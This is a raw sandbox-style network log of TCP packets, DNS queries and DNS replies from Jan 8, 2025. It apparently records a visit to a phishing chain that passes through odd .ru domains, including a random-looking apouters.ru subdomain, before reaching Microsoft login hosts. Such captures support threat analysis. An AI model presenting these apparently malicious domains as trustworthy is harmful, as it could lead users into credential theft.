                                                                                                Jan 8, 2025 14:50:41.468851089 CET50044443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.468852043 CET44350044172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.468910933 CET50044443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.469171047 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.469213963 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.469286919 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.469489098 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.469499111 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.943213940 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.943553925 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.943577051 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.944566011 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.944636106 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.944936991 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.944994926 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.945058107 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.987216949 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:41.987241030 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:42.033602953 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:42.518440008 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:42.518554926 CET44350045172.67.162.59192.168.2.5
                                                                                                Jan 8, 2025 14:50:42.518625975 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:42.527414083 CET50045443192.168.2.5172.67.162.59
                                                                                                Jan 8, 2025 14:50:42.527431011 CET44350045172.67.162.59192.168.2.5
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 8, 2025 14:48:08.158267021 CET6199353192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:08.158401966 CET5291053192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:08.164485931 CET53587821.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:08.167450905 CET53569031.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:08.169606924 CET53529101.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:08.171180964 CET53619931.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.634486914 CET5321353192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:09.634670973 CET5759753192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:09.711642981 CET53536681.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.734607935 CET53575971.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:09.798542976 CET53532131.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.202073097 CET4944953192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.718642950 CET6160253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.718952894 CET5275953192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.719450951 CET5212053192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.719575882 CET6000753192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.720030069 CET5927353192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.720201969 CET6029253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.725575924 CET53616021.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.725860119 CET53527591.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.725951910 CET53521201.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.726553917 CET53592731.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.726825953 CET53602921.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.726870060 CET53600071.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.832411051 CET6013053192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.832566023 CET5525053192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:11.839086056 CET53552501.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:11.839462042 CET53601301.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:12.955120087 CET6281453192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:12.955481052 CET6033153192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:12.960875034 CET5877653192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:12.961294889 CET6309453192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:12.961970091 CET53628141.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:12.962343931 CET53603311.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:12.967776060 CET53630941.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:12.967823982 CET53587761.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:13.041294098 CET5109253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:13.041763067 CET5428753192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:13.047859907 CET53510921.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:13.048223019 CET53542871.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:13.069120884 CET6321153192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:13.069266081 CET5556053192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:13.075952053 CET53632111.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:13.076106071 CET53555601.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.687992096 CET6410853192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:16.688388109 CET6292353192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:48:16.695183039 CET53629231.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:16.695195913 CET53641081.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:26.932981014 CET53609721.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:48:45.911824942 CET53554121.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:49:07.074471951 CET53610201.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:49:08.620348930 CET53549591.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:49:39.473196983 CET53614681.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:11.957356930 CET5813353192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:11.957482100 CET5827853192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:11.963882923 CET53581331.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:11.964186907 CET53582781.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.421751022 CET5279553192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:19.421900988 CET5524253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:19.428349972 CET53527951.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:19.428580999 CET53552421.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:21.055272102 CET5293953192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:21.055408001 CET5528553192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:21.061861038 CET53529391.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:21.062762976 CET53552851.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:25.868088961 CET53605931.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:39.016311884 CET6293253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:39.016455889 CET6463753192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:39.113835096 CET53646371.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:39.260411024 CET53629321.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:40.785837889 CET5989653192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:40.787734032 CET5064753192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:40.807724953 CET6549253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:40.808022022 CET6442453192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:40.935740948 CET53644241.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.004225969 CET53654921.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:41.856411934 CET5084953192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:41.856574059 CET6299553192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:41.863725901 CET53629951.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:43.966346025 CET5281853192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:43.966480017 CET5257153192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:43.973773003 CET53525711.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:44.944540024 CET6290753192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:44.944540024 CET5579453192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:45.259155989 CET6172153192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:45.259284973 CET5935253192.168.2.51.1.1.1
                                                                                                Jan 8, 2025 14:50:45.265938044 CET53593521.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:45.266377926 CET53617211.1.1.1192.168.2.5
                                                                                                Jan 8, 2025 14:50:50.476083994 CET53494001.1.1.1192.168.2.5
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 8, 2025 14:48:08.158267021 CET192.168.2.51.1.1.10xcc26Standard query (0)warrior-empire.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:08.158401966 CET192.168.2.51.1.1.10xe3aaStandard query (0)warrior-empire.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:09.634486914 CET192.168.2.51.1.1.10xf1a5Standard query (0)ppx.musicstrevbng.ruA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:09.634670973 CET192.168.2.51.1.1.10x3dabStandard query (0)ppx.musicstrevbng.ru65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.202073097 CET192.168.2.51.1.1.10x84b7Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.718642950 CET192.168.2.51.1.1.10x9447Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.718952894 CET192.168.2.51.1.1.10x83b2Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.719450951 CET192.168.2.51.1.1.10x2ee6Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.719575882 CET192.168.2.51.1.1.10x4172Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.720030069 CET192.168.2.51.1.1.10xf9f4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.720201969 CET192.168.2.51.1.1.10xcbdeStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.832411051 CET192.168.2.51.1.1.10x9a4cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.832566023 CET192.168.2.51.1.1.10x4ecStandard query (0)www.google.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.955120087 CET192.168.2.51.1.1.10x1e74Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.955481052 CET192.168.2.51.1.1.10x4a38Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.960875034 CET192.168.2.51.1.1.10xc549Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.961294889 CET192.168.2.51.1.1.10xeac2Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.041294098 CET192.168.2.51.1.1.10xa7e4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.041763067 CET192.168.2.51.1.1.10xa500Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.069120884 CET192.168.2.51.1.1.10xf266Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.069266081 CET192.168.2.51.1.1.10x8bffStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:16.687992096 CET192.168.2.51.1.1.10xaaa2Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:16.688388109 CET192.168.2.51.1.1.10x9f53Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:11.957356930 CET192.168.2.51.1.1.10x7bd9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:11.957482100 CET192.168.2.51.1.1.10x6992Standard query (0)www.google.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:19.421751022 CET192.168.2.51.1.1.10xc9a8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:19.421900988 CET192.168.2.51.1.1.10xa855Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:21.055272102 CET192.168.2.51.1.1.10x4611Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:21.055408001 CET192.168.2.51.1.1.10xc17fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:39.016311884 CET192.168.2.51.1.1.10x30a3Standard query (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ruA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:39.016455889 CET192.168.2.51.1.1.10x7a1bStandard query (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.785837889 CET192.168.2.51.1.1.10xcacdStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.787734032 CET192.168.2.51.1.1.10xe506Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.807724953 CET192.168.2.51.1.1.10xaa2dStandard query (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ruA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.808022022 CET192.168.2.51.1.1.10x7f5bStandard query (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.856411934 CET192.168.2.51.1.1.10xec11Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.856574059 CET192.168.2.51.1.1.10xb104Standard query (0)www.office.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.966346025 CET192.168.2.51.1.1.10x7fcStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.966480017 CET192.168.2.51.1.1.10x3d02Standard query (0)www.office.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:44.944540024 CET192.168.2.51.1.1.10x28e8Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:44.944540024 CET192.168.2.51.1.1.10x66c3Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:45.259155989 CET192.168.2.51.1.1.10x799aStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:45.259284973 CET192.168.2.51.1.1.10x352dStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 8, 2025 14:48:08.171180964 CET1.1.1.1192.168.2.50xcc26No error (0)warrior-empire.com103.83.194.55A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:09.734607935 CET1.1.1.1192.168.2.50x3dabNo error (0)ppx.musicstrevbng.ru65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:09.798542976 CET1.1.1.1192.168.2.50xf1a5No error (0)ppx.musicstrevbng.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:09.798542976 CET1.1.1.1192.168.2.50xf1a5No error (0)ppx.musicstrevbng.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.209199905 CET1.1.1.1192.168.2.50x84b7No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.725575924 CET1.1.1.1192.168.2.50x9447No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.725575924 CET1.1.1.1192.168.2.50x9447No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.725575924 CET1.1.1.1192.168.2.50x9447No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.725575924 CET1.1.1.1192.168.2.50x9447No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.725951910 CET1.1.1.1192.168.2.50x2ee6No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.725951910 CET1.1.1.1192.168.2.50x2ee6No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.726553917 CET1.1.1.1192.168.2.50xf9f4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.726553917 CET1.1.1.1192.168.2.50xf9f4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.726825953 CET1.1.1.1192.168.2.50xcbdeNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.726870060 CET1.1.1.1192.168.2.50x4172No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.839086056 CET1.1.1.1192.168.2.50x4ecNo error (0)www.google.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.839462042 CET1.1.1.1192.168.2.50x9a4cNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.921993971 CET1.1.1.1192.168.2.50x5a5fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:11.921993971 CET1.1.1.1192.168.2.50x5a5fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.961970091 CET1.1.1.1192.168.2.50x1e74No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.961970091 CET1.1.1.1192.168.2.50x1e74No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.962343931 CET1.1.1.1192.168.2.50x4a38No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.967823982 CET1.1.1.1192.168.2.50xc549No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.967823982 CET1.1.1.1192.168.2.50xc549No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.967823982 CET1.1.1.1192.168.2.50xc549No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:12.967823982 CET1.1.1.1192.168.2.50xc549No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.047859907 CET1.1.1.1192.168.2.50xa7e4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.047859907 CET1.1.1.1192.168.2.50xa7e4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.048223019 CET1.1.1.1192.168.2.50xa500No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.075952053 CET1.1.1.1192.168.2.50xf266No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.075952053 CET1.1.1.1192.168.2.50xf266No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:13.076106071 CET1.1.1.1192.168.2.50x8bffNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:48:16.695195913 CET1.1.1.1192.168.2.50xaaa2No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:49:21.918786049 CET1.1.1.1192.168.2.50x508fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:49:21.918786049 CET1.1.1.1192.168.2.50x508fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:49:54.541671038 CET1.1.1.1192.168.2.50xcc5fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:49:54.541671038 CET1.1.1.1192.168.2.50xcc5fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:11.963882923 CET1.1.1.1192.168.2.50x7bd9No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:11.964186907 CET1.1.1.1192.168.2.50x6992No error (0)www.google.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:19.428349972 CET1.1.1.1192.168.2.50xc9a8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:19.428349972 CET1.1.1.1192.168.2.50xc9a8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:19.428580999 CET1.1.1.1192.168.2.50xa855No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:21.061861038 CET1.1.1.1192.168.2.50x4611No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:21.061861038 CET1.1.1.1192.168.2.50x4611No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:21.062762976 CET1.1.1.1192.168.2.50xc17fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:39.113835096 CET1.1.1.1192.168.2.50x7a1bNo error (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:39.260411024 CET1.1.1.1192.168.2.50x30a3No error (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru104.21.82.188A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:39.260411024 CET1.1.1.1192.168.2.50x30a3No error (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru172.67.162.59A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.792505980 CET1.1.1.1192.168.2.50xcacdNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.794773102 CET1.1.1.1192.168.2.50xe506No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.934221983 CET1.1.1.1192.168.2.50x5caNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.934221983 CET1.1.1.1192.168.2.50x5caNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:40.935740948 CET1.1.1.1192.168.2.50x7f5bNo error (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru65IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.004225969 CET1.1.1.1192.168.2.50xaa2dNo error (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru172.67.162.59A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.004225969 CET1.1.1.1192.168.2.50xaa2dNo error (0)mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru104.21.82.188A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.863711119 CET1.1.1.1192.168.2.50xec11No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.863711119 CET1.1.1.1192.168.2.50xec11No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.863725901 CET1.1.1.1192.168.2.50xb104No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:41.863725901 CET1.1.1.1192.168.2.50xb104No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.052967072 CET1.1.1.1192.168.2.50xaa02No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.052967072 CET1.1.1.1192.168.2.50xaa02No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.941849947 CET1.1.1.1192.168.2.50xf93aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.941849947 CET1.1.1.1192.168.2.50xf93aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.973678112 CET1.1.1.1192.168.2.50x7fcNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.973678112 CET1.1.1.1192.168.2.50x7fcNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.973773003 CET1.1.1.1192.168.2.50x3d02No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:43.973773003 CET1.1.1.1192.168.2.50x3d02No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:44.951534986 CET1.1.1.1192.168.2.50x66c3No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:44.951615095 CET1.1.1.1192.168.2.50x28e8No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 14:50:45.265938044 CET1.1.1.1192.168.2.50x352dNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
